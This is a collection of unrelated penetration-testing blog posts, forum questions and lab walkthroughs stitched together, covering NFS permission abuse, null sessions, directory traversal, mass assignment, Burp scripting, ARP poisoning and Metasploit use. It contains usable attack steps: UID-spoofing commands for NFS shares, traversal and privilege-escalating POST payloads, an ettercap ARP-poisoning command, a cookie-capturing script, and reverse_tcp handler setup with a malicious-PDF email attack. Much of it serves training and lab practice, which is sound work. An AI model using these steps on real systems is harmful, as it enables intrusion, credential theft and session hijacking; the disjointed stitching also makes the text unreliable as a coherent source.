We are going to be releasing a few blog posts on our thoughts on why we have to better communicate what works in actually securing something! This first post is on why we created our new class Offensive Techniques.With all the "APT" hype, 0 Day discussions, and endless numbers of intrusions we were having a hard time not screaming at the IT industry and saying pull your head out! Our good friend Dino Dai Zovi hit the nail on the head of why we created the Offensive Techniques class. He did this with a couple of tweets that read "Oh, I see what you have been doing all of this time. Solving problems that don't exist while ignoring the real ones in front of your face." Followed shortly by, “For example: defending against pen tests and security researchers instead of actual attacks and attackers. How's that working out for you?" Countless numbers of times we have either conducted a test or incident response for a business that was decimated by some type of targeted attack. The techniques used by either us or the attacker are usually not what is being taught in traditional penetration testing classes in the industry. The attack didn’t have nessus run against it or some type of vulnerability scanner. They usually didn’t even have nmap (they used a batch file with a for loop and ping/netcat for a quick port scanner). The attacks combined deep operating system level knowledge to circumvent mis-configurations, some good custom tools, and even metasploit! So why is it with the rise in increased spending with IT security that we see little progression in defending and detecting against attacks that are not pulled off by a trained pen tester? It is because we don't train or watch for these types of attacks, and we never have. They have been going on for decades not just the past 5 years or so. Take a look at the regulations on companies/organizations in relation to securing data. The regulations are just a checkbox game and the results of these regulations really don’t improve security that much, if at all. You can implement everything from NIST 800-53 and we will still get in and wreak havoc! Organizations and companies are bogged down with bureaucracy to even adapt as fast as they need to. We have to change the cultural mind of mid-senior level executives, politicians, and even some system administrators. Offensive Techniques is teaching how to really conduct offensive cyber operations, not auditor based attacks. Offensive Techniques is one of many Attack Research classes designed to help change how we go about actually providing organizations/companies with real threat based/vulnerability based results on how they are truly vulnerable. It teaches the fundamentals of how to conduct real attacks. We are debuting the class in October at Countermeasures 2012, but will be holding a class in the United States in November (more details to come on that). If you are interested in this or any other of our trainings reach out and send us an email at training@attackresearch.com

The module is in the trunk, you can read the post but in my experience newer version of Lotus Domino dont actually advertise that they are lotus domino in the banner, thus you need a way to identify these and once identified figure out current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses google dorks, which is useful as long as the site is indexed. While not in the trunk, awhile back i had a bunch of domino servers on a pentest. I ended up taking all the domino scanners i could find and combing those wordlists into one wordlist and writing a metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world and which ones require authentication (correct behavior) and any the forwarded you to somewhere else (probably because you are on 80 and the site requires 443).

Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.

Low? currently an "info" with Nessus 5Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share use the following after first creating a directory on your local machine:[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badpermschange directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1to abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the shareumount /local_dir

create a user called daveuseradd davepasswd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into daves directorycd dave

issue the commandsu dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the slides) videowhite paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!The second post talks about doing something more than calc.exe...getting shell whooo hooooo

You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.

I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is

Against mis-configured servers

Against domain controllers to pull info

Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

Sometimes even though the deployer functionality is password protected the sever-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?This can be useful to find:

Lists of applications

Recent URL's accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun let's seeLooking at the list of applications list one that doesnt look normal (zecmd)Following that down leads us to zecmd.jsp that is a jsp shellIf you are interested in zecmd.jsp and jboss worm it comes from --> this is a good write up as well as this OWASP preso https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdfthoughts?-CG

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. so first example is a VNC server with no password. This gives us a HIGH severity finding

The following is a VNC server with a password of "password"see the problem? Same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well, MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. the problem is 1) you have to find them on the random ass port they are running on and 2) you have to get eyes on them. this can be a hassle/problem/hard to do.

So to bring the "low" to it. some random HTTP server gets you this in Nessus

Now, to be fair this could be totally accurate, but the point is you need to look at what is being served on this HTTP server, could be something could be nothing, no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:

Nmap your range

Import your nmap results into metasploit

Use the db_ searches to pull out a list of hosts & ports

With the magic of scripting languages make that list into an html page(s)

Kinda goes like this:after you have imported your nmap results, uses the services option.If its populated you'll get a list or results like the belowOutput that stuff to a CSV

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it

The above code will output an html file that you can open with linkylinky will open each link in a new tab allowing you a way to get eyes on each of those random HTTP(S) services.You can now start intelligently trying default passwords or viewing exposed content.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest I have been guilty of this myself. Most of us probably have a for a variety of reasons, time, experience, level of effort required/paid for, etc. This over reliance on scanners has lead to a "no highs" == "secure environment". Most of us know this is not *always* the case and the point of the talk was to show some examples were medium and low vulnerabilities have led to a further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity its becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality some clients have been conditioned that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean ever SSLv2 enabled should be full out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings cant be turned into something more.

5. Keep in a human in the mix. Tools/scanner are great for automating tasks but I don't think we are there yet with the technology of taking multiple less severe vulnerabilities and turning them into something significant. Bottom line, the scanner wont find all your ownable stuff, you need a person(s) to do this.

In cktricky's last post he provided a great outline on the ins and outs of leveraging burp's built in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: How do I find directory traversal & what should I look for if I do?Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, css call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself-- because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX to services type calls, sometimes in cookies, and occasionally are how pages themselves get served. These all basically look something like: somefunction.php?img=/some/place/graphic.jpg or somefunction.php?page=/view/something

The path to the file can either be relative (../../../etc) or in some more rare cases absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded or sometimes encrypted. Neither is a stop get.You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded be about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:

Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that.

Now what?

Once you've identified a location which appears to be ripe for the testing-- how do you verify and what would you do? To verify, I have found two approaches that work well: default files & known files.The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache Default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to-- the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like: /mainpage.asp /vulnerableFeature.asp?path=/images/some-image.jpgyou'd test for: /vulnerableFeature.asp?path=../mainpage.asp /vulnerableFeature.asp?path=/mainpage.aspSince you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify if your directory traversal is working. You may even get back source code this way. :-)If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & sam files). If you are attempting to do an involuntary code review, you should steal the source code from the pages you are looking at. There are occasionally hard coded credentials source, but application configuration files are often gold for credentials. I've found database, admin users, SMTP credentials and FTP users this way.

Some final things to consider:

Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.

When dynamic features serve files, they often violate other protections. In IIS for instance various extensions cannot be served by the server (.config files for instance). However in most directory traversals you can pull the web.config file out w/o many problems.

User controlled uploads often get served dynamically because there isn't a way for the server to know before-hand what the files are. You can sometimes find directory traversal here by uploading files with weird path's in their names (or renaming them after upload).

Developers sometimes leave clues to file's physical locations in comments. I once downloaded a source for an entire site because of this.

Often, I'll use Burp Suite's directory traversal Intruder payload list. A step exists that must be performed in order to effectively leverage the traversal payload. We'll briefly cover this.

Intruder with the insertion point (fuzzing the file parameter)

Burp's fuzzing-path traversal payload, available under the preset list payload set, has a placeholder that represents the filename you'd like to fuzz for. This placeholder "{FILE} ", must be substituted with an actual filename (ex: /etc/passwd).

As you can see, the additional step was adding a payload processing rule. We chose match/replace, escaped characters that represent regular expressions (curly braces {}) by placing a backslash in front of them and replaced them with etc/passwd.

Lastly, don't forget to select/deselect the URL-encoding of characters based on your needs.

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes but for some reason the psexec module wouldn't get code execution, it would act like it would work but wasn't. So we decided to push a binary, use winexe that was modified to pass the hash to exec the binary as needed. It went something like this... ################################################### add a route to the 10.x network thru session 1##################################################

######################################################## psexec wouldnt work. AV eating metsvc most likely...# used smb/upload_file to place a binary on the box######################################################msf exploit(handler) > use auxiliary/admin/smb/upload_filemsf auxiliary(upload_file) > info

Name Current Setting Required Description ---- --------------- -------- ----------- LPATH yes The path of the local file to upload RHOST yes The target address RPATH yes The name of the remote file relative to the share RPORT 445 yes Set the SMB service port SMBSHARE C$ yes The name of a writeable share on the server

Description: This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.

###################################################################### Use winexe with pass the hash to get cmd shell and run the binary#####################################################################

Over the last two cycles of OWASP top 10, insecure direct object reference has been included as major security risk. An object reference is exposed and people can manipulate that to access other objects they aren’t supposed to. But an apparently lesser-known problem is when the object itself is directly exposed. This happens when an object maps user-controlled form data directly to it’s properties with out validation.

Perhaps this issue gets less press because every language calls this problem something different. In ruby, people call this mass assignment. In .NET and Java it’s often referred to as reflection binding. Regardless of name, it is how the object obtains it’s data which is of concern.

In ruby, vulnerable code might look like this:

@foo = Foo.new(params[:foo])

The params call wants to make life easy and will automagically map any form data that matches the object’s parameters for you—unless you say otherwise. This is a very common convention used in MVC frameworks, because manually mapping a form POST to an object is annoying. The problem here is that it makes no difference to the controller whether you’ve exposed that field in the presentation layer. It just has to exist on the object.

In other words-- if you were updating a product quantity for your shopping cart, you might be able to change the price by guessing that a price field exists. Just add the price field to your POST parameters and it might override the value. This approach can be effective—but it is mostly a guessing game at that point. Some frameworks let you throw tons of arbitrary data and whatever sticks, sticks. Others will barf on invalid parameters.

There is a second route, however, which is why vulnerability deserves more attention. When I said that you are allowed to map to anything on the object, I meant it. You can map complex objects to other complex objects, as far as they related to each other. Lets look at an example in C#:

Behind the scenes, the framework maps all of the form data directly into the foo object. Developers also sometimes do this directly by calling the UpdateModel() function. In either usage, if someone sent a malicious POST to the “Create” view:

Foo.Bar.name=“hello”&Foo.Bar.is_admin=true&Foo.name=“myfoo”;

You’d end up with a full fleshed out object where:

Foo.name = “myfoo” Foo.Bar.name = “hello” Foo.Bar.is_admin = true

The Bar object is instantiated automatically through it’s empty constructor, and it’s properties are mapped as well. Any reference the exposed object has, you can bind to. This also works for arrays of simple or complex types too. If instead of a single instance you had an array or List<Bar> you would just do the following:

Foo.Bar[0].name=“hello”&Foo.Bar[0].is_admin=true

With out any other validations, this is all kosher.

In the wild I’ve used this attack to escalate privileges by updating my profile and walking down to a permissions table. I’ve also run across places where you could register every user to come to an event. And another instance where you could take over other people’s blog posts simply by editing your own profile.

If you search for this during tests, here are some key things I’ve learned:

This vulnerability is best identified with access to source code—and very few developers seem to protect against it.

When reviewing code, pay attention to how the constructor works and how fields are set on the object. Some properties are set via functions and you can’t bind them directly. Other objects don’t have empty constructors. This causes the attack to fail.

I frequently find this vulnerability on “update” and “create” controller actions.

You can, and I have, found this w/o source—its just harder. You do so by creating a loose type map through browsing the site.

You can create a type map by following a process like this:

Going to the object's “create” page and note all the form fields that are there. That is your basic “object”. As you see these objects in other places on the site, they might reveal more about their structure.

The site will guide you in what you need to know about object relationships. If you are looking at your cart, and it has a list of products & their details-- the cart object has a list of products.

For everything else, there are common object relationships you can just assert. Carts do generally have products, just as people generally have permissions. Take some time and look over common object models on the interwebs.

This attack route exists on pretty much every MVC based framework. In particular, Spring, Struts, MVC.Net and Ruby on Rails are all vulnerable. Maybe others, but those are so popular I’ve not really looked much deeper into it.

It is true that developers can prevent this by white listing specific fields to bind—but they don’t. The whole point of the convenience functions is convenience. If you’ve built an MVC application and didn’t go out of your way to protect against this—you are most likely vulnerable to it.

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of post messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with intruder/repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be ran by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series:

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is going to be run against the proxy history, it's going to search the proxy history looking for the interesting requests. After you've interacted with the site type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this :-)First we establish parameters that could be interesting to us in terms of performing manual analysis.This method '$burp.run' is the catalyst for everything that comes next. When the user types $burp.run at the console they are invoking this method. Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if the length is greater than 0. If so, start iterating thru each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passes it the 'obj' object). Line 8 calls extract_str with the result of Line 7 (hmeth...which is the HTTP Method) and the 'obj' object.

The req_meth takes the request_headers, takes the first line and converts it to a string. The '[0..3]' method extracts the first 4 characters of the first line of the request headers. The method returns this value.

Part 1 of extract_strThe extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to repeater/intruder (along with the alert). The second line splits objs into the http_meth and req objects. The third line ensures that we do not execute any further code unless the http_meth is a POST method. Then we instantiate the bparams object as a Hash on line 4.On line 5, the request_body gets split by the ampersand (so that we break up all the params and their values into key/value pairs (ex: Price=2099.00).Next, we split these pairs up by the '=' (equal sign) and place each param/value (key/value) into the bparam hash. Conceptually the bparam hash would look likebparam = {'Price' => '2099.00}The last line assigns either true or false to the proto object based on whether or not the protocol is https.Part 2 of extract_strHere we begin iterating thru each item in the FUZZ_PARAM array. If the bparam hash has as key which matches on of the items in FUZZ_PARAM, we send it to intruder/repeater and issue our alerts.Explanation of methods:

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

This following portion of code contains a PREFIX array (both http and https). We perform an iteration of both and while iterating through this prefix array, we start iterating through a second list (EXCLUSION_LIST) and concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is called and we submit the concatenated value (url) to it.

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series so we won't discuss this in detail. The code @@msg = nil exists solely to instantiate a global object called msg. We will need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and response message.

pre = is_https? 'https' : 'http' is just a way to define the "pre" object based on whether or not it is http or https message.

pre_bool does the same thing as the pre object but instead of http/https it is a true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).

The last three lines of code here basically set the @@msg value. We only want to do this if it is a request. Remember, we need an object to hold the request message so that even if the current message is a response we can call both the request message and response message.

Next bit of code basically says, if this message is in scope AND is a request message, start performing an active scan. Otherwise if it is a message which is in scope but a response message then perform passive scanning.

So let's cover each individually with brief explanation and a code example.You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

EVT_HTTP_MESSAGE---------------------------------

The following code will allow you to obtain methods exposed by the message_info object (which is a class):

The 3 separate objects that make up the param are:

tool_name => This is a string value, it is the name of the tool for which the message originated. Examples include proxy, scanner and repeater.

is_request => Boolean value (true/false), this returns true when it is a request and false when a response.

message_info => This is a class. It is an instance of the IHttpRequestResponse Java class. So there are methods such as get_comment, set_comment and getUrl exposed.

An example of using evt_http_message can be seen here (code):

....and the resultw00t!So what does the code actually do?Lines 1 and 2 - Define the method and separate param into 3 separate objects.Lines 3-5Ln 3 If the tool the message originated from was the spider and this is NOT a request proceed to Ln 4.Ln4 If the response status code is 200 (OK), then move to Ln 5.Ln 5 Puts "Yo, we received a 200 FTW!" to the console.Lines 6-9 Are closing statements/method and passing the param back up to the superclass method.

You can find another example using this method in the zlib_inflate.rb script.

EVT_SCAN_ISSUE---------------------------

The following code will allow you obtain methods exposed by the issue object (which is a class):

Only one object is exposed, it is a class, it is called issue. Some of the methods exposed by this class are

Lines 1-2 - Defines the method (prnt) and separates objs into two objects (strn, meth).Lines 3-4 - This defines a string instance variable (str), and then proceeds to put the strn object onto it. Lines 6-10 - We take the meth object which is an Array, we iterate thru each item in the array, convert it to a string while calling the four methods it exposes (request_headers, request_body, response.headers, and response_body). Now these methods all belong to http_messages and itm really represents the http_messages class. So when we are iterating thru this array we are really iterating thru an array containing a bunch of http_messages classes. Hopefully that makes sense.

Line 1 - Defines the method ($burp.evt_scan_issue) and instantiates the "issue" object.

Lines 2-14 - Creates an Array called "meth_array" which consists of methods associated with the issue object instantiated on line 1.

Lines 16-18 - Iterates thru the meth_arry we created on line 2 picking out each method and then sends the method name and the method itself to prnt.

Line 20 - The http_message method attached to the issue object isn't in the meth_arry because it can't be called directly and converted to a string. This is because http_message is a an array of classes. Each class has it's own methods. So, we made a special prnt method for it called hm_prnt.

Well that is all for Part 3 of this series. Part 4 will cover some of the other methods listed in the first part of this post. If you have any feedback please provide it so that the series can be improved upon.Happy Hacking,

Lets cover one of the most used methods (in my opinion/experience) exposed by buby called "evt_proxy_message". I'd like to cover some of the objects exposed by this method and to best accomplish this task we will step through the cookie_snatch.rb script located Here.

On the second line you see that we convert *param to 12 separate objects. Here is a brief explanation of each:msg_ref===== This is the request/response number. It is nothing more than a tracking number.is_req====This is a boolean value, returns either true or false. If it is a request, this returns true, else, false.rhost===This is your target's hostname ONLY. It does NOT include the prefix (http/s), rport (80/443), or path (/directory/something.php).rport===This is the remote port value (80/443/etc)is_https======Returns true when https and false when http.http_meth=======This is the method (GET/POST/etc)url==This is the path portion of a URL. Not the full URL itself.Example: If the target was http://www.target.com/mydir/test.aspx then url would be /mydir/test.aspxresourceType==========The filetype of the requested resource, or nil if the resource has no filetypestatus====The HTTP status code returned by the server. This value is nil for request messages.req_content_type============String value, content-type header returned by the server. (nil for requests)message======String value, the entire message, regardless of request/response, contains headers and body.action====There are 4 types of actions ACTION_FOLLOW_RULES (0, this is the default)ACTION_DO_INTERCEPT (1, direction to intercept a msg)ACTION_DONT_INTERCEPT (2, don't intercept the msg)ACTION_DROP (3, drops the in/outbound msg)Example of using action (folks seem to have some confusion at times regarding this):if rhost == "www.example.com action[0] = 2endThe above code logic is, if the rhost value is www.example.com then don't intercept. The full code can be found in dont_intercept.rb in the Buby-Scripts repo.Back to the code:Lines 3-5Ln 3 is assigning cookiez.txt to 'file'.Ln 4 is evaluating the boolean value behind is_https?. If it is true then prefix = https:// and if false, http://.Ln 5 is creating a rurl object which consists of a string concatenation of prefix, rhost and rport.Lines 6-9Ln 6 is evaluating if is_req equals false (meaning it is a response). So unless it is a response, the code following it won't be run.Ln 7 spmsg (split message) is the message string split by two newlines. This separates the headers from the body. Array item 0 of spmsg (spmsg[0]) is going to be the headers and spmsg[1] will be the body.Ln 8 short_msg is assigned to spgmsg[0], converted to a string.Ln 9 assigns mitem to a the Set-Cookie portion of the response header.Lines 10-12Ln 10 uses the method in_scope?, which takes the full URL. This is the reason for creating the rurl object on line 5. If the response is from a site that is in scope, we evaluate the next 2 lines of code.Ln 11 basically if mitem (the Set-Cookie key, value) isn't nil, then we evaluate line 12.Ln 12 Open the file (file is created on line 3 and it is cookiez.txt), and write to it. Because we have assigned "a" instead of "w", the cookies will be appended versus overwritten.The rest of the code terminates "if" statements and sends the params up to the super class's version of evt_proxy_msg. This super(*params) can be nice when you'd like to modify data prior to it's arrival to Burp. Okay, well hopefully this was a good start for those interested in extending Burp's capabilities. Part 3 in this series will cover other useful methods exposed by Buby. ~Happy Hackingcktricky

I am having the same problem as the person in a post in the "wireless" area (thread name: Low #/s) - that is, a problem with gathering enough packets.

I'm on a brand new Dell Studio 1555 (core i5, 4GB RAM) with an Intel wireless card with an Intel 4965/5xxx chipset (according to airmon-ng). From what I've heard, the card only recently got its driver added to the kernel, but it works fine with bt4 out of the box. I've run injection tests, and they have worked fine.

I then start collecting packets, and find that I have a really low rate, and really low power (generally around -30) so I try to do packet injection. I get the "Association successful :-)" notification and plenty of ARP requests, and it says that I'm sending out loads of packets.

The rate of collection, however, remains completely unchanged.

I then go back to test injection, and it no longer works.

In other words, it's completely identical to the problem that the person in the thread I mentioned above has.

I've been evaluating ettercap's features in my LAN and now I got a problem that I just can't solve. After 2 days trying to find out what's going on, I finally gave up. So, here I am, asking for a few clarification words. :) Maybe I've missed something. Heh.

My main distro is not BT, but Debian squeeze. I would try ettercap's forum for this issue, but it seems to be "dead". As I believe it's not directly Debian related, the place containing people with enough knowledge on the subject would be here. Hope it's not a problem (and this is the right forum to do so).

I'm running ettercap NG-0.7.3 in Debian squeeze, kernel 2.6.33-amd64.

So, here we go: ettercap's built-in dissectors don't work at all, as it seems to receive corrupt/malformed packets from the network. SSL dissector, which uses iptables for redirection does works though. Strangely enough, if I fire wireshark and start capturing, I can see the packets correctly (and a lot of out-of-order or duplicated ACKs, which I believe is normal.. sort of). Since I used official packages from Debian repo, I tried to compile ettercap myself, with --enable-debug and see if there was any clues about what's going on in its logs. Unfortunately, no. Dissectors aren't fired, never (except for the SSL), and no relevant log entry.

I booted BT4 Final to give it a try. To my surprise, it does works! ettercap sees all packets correctly, dissector works perfectly. Even dissector-dependent plugins (for URL sniffing), like remote_browser works.

Tried the same ettercap parameters with 2 different wifi cards: Intel 4965AGN and a external RTL8187L. Same results, Debian = corrupt packets, BT = 100%. Here is the command line I've used in the tests:
Code:
ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.7/ (.1 = GW / .7 = Target)
Here is a sample packet dump from both distros, with target visiting yahoo (trimmed the log, just the initial packets are enough, as the same behavior occurs in the other packets):

Sat Apr 3 00:42:50 2010
TCP 200.152.168.178:80 --> 192.168.1.7:40942 | A
As you can see in Debian, the packets are likely incomplete or with some "offset", so the dissectors, nor plugins, can correctly parse useful data from it. ARP poisoning is working perfectly, as shown by chk_poison and wireshark.
The first DNS resolution packets (UDP) seems to be OK in both distros, but not TCP ones.

I have no idea on where to look now. Maybe something is trashing the packets before it arrives in ettercap.

If someone have one (or many) ideas to share, I'll be very grateful. :) If more info are needed, please tell me, I'll promptly reply.

Commands:http://pastebin.com/2Eq1zG88What is this?
This is my walk though of how I broke into pWnOS v1.
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points

ScenarioA company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)

Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

This is one method of getting in, the author did say that there is multiple ways in!

It took me a bit of work to also to get it to work with virtual box & static IP addresses.
Read my post here (short answer - need configure another interface via another OS)

So I am just trying to get into one of the AP I have set up around my house that is set to WEP. I am following the tutorial on the Aircrack-ng wiki and everything goes fine until I get to the fake authentication at that point I enter all the stuff they say including my normal hardware's mac address and I get out put like this:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
and it repeats then after a while it tells me the attack has failed. I have tried from different distances, across the house and right in front of the router but no go.

I looked for a bit on google and found a post here that talked about mac filtering, so I checked my router and it isn't enabled still though I took my netbook and connected it to the AP to get the mac address and then changed my computers to that address, turned the netbook off and tried to authenticate but again I get the same output and a failed attack.

hello all
i am trying to get remote access to my main computer on my network using the set email attack.
however when i open the pdf i do not get command line access!
see below:
thanks in advance for the advice
yoma

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

#set paypload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exeNotes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.

What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

I am relatively new to these forums, and somewhat new to Backtrack.
I was wondering if somebody on here could help me with my Partition Table. I was trying to re-arrange it and make it neater and cleaner.

